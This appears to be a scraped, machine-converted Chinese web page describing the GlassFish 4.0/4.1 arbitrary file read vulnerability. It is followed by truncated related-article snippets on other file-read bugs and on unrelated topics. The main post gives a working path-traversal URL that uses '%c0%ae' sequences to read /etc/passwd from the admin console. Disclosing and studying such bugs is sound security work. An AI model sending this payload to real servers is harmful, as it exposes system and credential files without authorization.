glassfish任意檔案讀取漏洞(4.0/4.1)
相關廠商:glassfish
漏洞編號:wooyun-2010-0144595
漏洞詳情:
http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
java語音中會把"%c0%ae"解析為"\uC0AE",最後轉義為ASCCII字元的"."(點)。
簡簡單單幾句話詳述了漏洞內容,而且這是一枚真真正正的0day漏洞,並且更有趣的是這個漏洞的提交者同樣是一個真真正正的路人甲。
相關推薦
glassfish任意檔案讀取漏洞(4.0/4.1)
相關廠商:glassfish漏洞編號:wooyun-2010-0144595漏洞詳情:http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae
應用伺服器glassfish任意檔案讀取漏洞
事情就這樣默默發生了 在2015年的10月3日,一位路人甲同學在烏雲上釋出了一個名為“應用伺服器glassfish存在通用任意檔案讀取漏洞”的漏洞,大致內容如下: 漏洞作者:路人甲 相關廠商:glassfish 漏洞編號:wooyun-2010-0144595 漏洞
【程式碼審計】大米CMS_V5.5.3 任意檔案讀取漏洞分析
0x00 環境準備 大米CMS官網:http://www.damicms.com 網站原始碼版本:大米CMS_V5.5.3試用版(更新時間:2017-04-15) 程式原始碼下載:http://www.damicms.com/downes/dami.rar 測試網站首頁:  
24.Windows任意檔案讀取漏洞
漏洞概述: 近日,國外安全研究員SandboxEscaper又一次在推特上公佈了新的Windows 0 day漏洞細節及PoC。這是2018年8月開始該研究員公佈的第三個windows 0 day漏洞。此次披露的漏洞可造成任意檔案讀取。該漏洞可允許低許可權使用者或惡意程式讀取目標Windows主機上任意
WEB安全系列之如何挖掘任意檔案讀取漏洞
$fp="../template/".$siteskin."/area_show.htm"; $f = fopen($fp,'r'); $strout = fread($f,filesize($fp)); fclose($f); $strout=str_replace("{#siteskin}",$site
PHPMailer命令執行及任意檔案讀取漏洞
今天在thinkphp官網閒逛,無意下載了一套eduaskcms,查看了一下libs目錄中居然存在PHPMailer-5.2.13,想起了之前看到的PHPMailer的漏洞,可惜這套CMS只提供了一個郵箱介面,前臺頁面需要單獨自己寫,沒辦法用這套CMS進行復現,這邊也順便
PhpMyadmin任意檔案讀取漏洞
libraries/import/xml.php中 unset($data); /** * Load the XML string * * The option LIBXML_COMPACT is specified because it can
【程式碼審計】任意檔案讀取漏洞例項
0x00 前言 大多數網站都提供讀取檔案功能,一般實現過程是,根據引數filename的值,獲得該檔案在網站上的絕對路徑,讀取檔案。 這裡,通過兩個任意檔案讀取漏洞例項去展示漏洞原理、漏洞危害。 0x01 漏洞例項一 環境搭建: XYHCMS官網:http:
Windows任意檔案讀取漏洞
低許可權使用者或惡意程式能夠讀取目標Windows計算機上任何檔案的內容,設想你取得了一個普通許可權,還能幹嗎,用該漏洞作者SandboxEscaper的一句話來說,也許是密碼檔案,我不夠聰明,不知道能幹嗎。 漏洞故事 Twitter別名SandboxEscaper
Jenkins 任意檔案讀取漏洞分析
一、漏洞背景 漏洞編號:CVE-2018-1999002 漏洞等級:高危 Jenkins 7 月 18 日的安全通告修復了多個漏洞,其中 SECURITY-914 是由 Orange (部落格連結:http://blog.orange.tw/)挖出的 Jenkins 未授權任意檔案讀取漏
Apache Solr任意檔案讀取漏洞復現
Apache Solr任意檔案讀取漏洞復現 一、簡介 Solr是一個獨立的企業級搜尋應用伺服器,它對外提供類似於Web-service的API介面。使用者可以通過http請求,向搜尋引擎伺服器提交一定格式的XML檔案,生成索引;也可以通過Http Get操作提出查詢請求,並得到XML格式的返回結果。
Weblogic漏洞之弱口令、任意檔案讀取、上傳shell
弱口令 環境啟動後,訪問http://192.168.1.15:7001/console/login/LoginForm.jsp,即為weblogic後臺。 本環境存在弱口令可以直接登入: weblogic [email protected]
烏雲漏洞筆記1-任意檔案讀取
閱讀時間16.01.18 page1-3 敏感欄位 &RealPath= &FilePath= &filepath= &Path= &
IIS 安裝了.net framework 4.0/4.5 卻找不到相應應用程序池
ive framework 在哪裏 2.0 backward repl new es2017 com 通常情況下是因為沒註冊造成的,有些安裝包會自己幫你註冊上有些不會,感覺略坑。 註冊方法:在計算機中點擊 開始菜單–>運行 拷貝以下內容運行一下即可。
12.Weblogic 檔案讀取漏洞復現
利用docker環境模擬了一個真實的weblogic環境,其後臺存在一個弱口令,並且前臺存在任意檔案讀取漏洞。 分別通過這兩種漏洞,模擬對weblogic場景的滲透。 Weblogic版本:10.3.6(11g) Java版本:1.6 弱口令 環境啟動後,訪問 http://192.
Hollong 低功耗藍芽4.0/4.1/4.2 BLE Sniffer協議分析儀
名稱:緯圖Hollong BLE藍芽 監控分析儀 品牌:ViewTool/緯圖 型號:VTH201A 典型應用: - 抓取BLE藍芽傳輸資料,分析資料傳輸協議; - 實時捕獲、顯示、分析、過濾協議資料,減少除錯時間,加速產品進入市場; - 協助開發除錯BLE相關
Hollong 藍芽4.0/4.1/4.2 BLE協議監控分析儀
品牌:ViewTool/緯圖型號:VTH201A 典型應用: - 抓取BLE藍芽傳輸資料,分析資料傳輸協議; - 協助開發除錯BLE相關軟體,韌體; - 實時捕獲、顯示、解析、過濾和偵測協議錯誤,減少除錯時間,加速產品進入市場; - 幫助學習BLE藍芽傳輸協議; &nb
Ubunt16.04 + Tensorflow1.4.0 + opencv3.1.0 + cv2 + myavi安裝教程
文章目錄 1. 安裝Tensorflow 2. 安裝opencv和cv2 安裝opencv的支援庫 克隆opencv包 用CMake安裝 Build 可以選擇安裝文件 安裝libraries 測試
訊息通訊庫ZeroMQ 4 0 4安裝指南
分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow 也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!  
Centos 7.5安裝配置MongoDB 4.0.4
解壓 分布式 pwd tgz remote des work nan run MongoDB 是一個基於分布式文件存儲的數據庫。由 C++ 語言編寫。旨在為 WEB 應用提供可擴展的高性能數據存儲解決方案。MongoDB 是一個介於關系數據庫和非關系數據庫之間的產品,是非關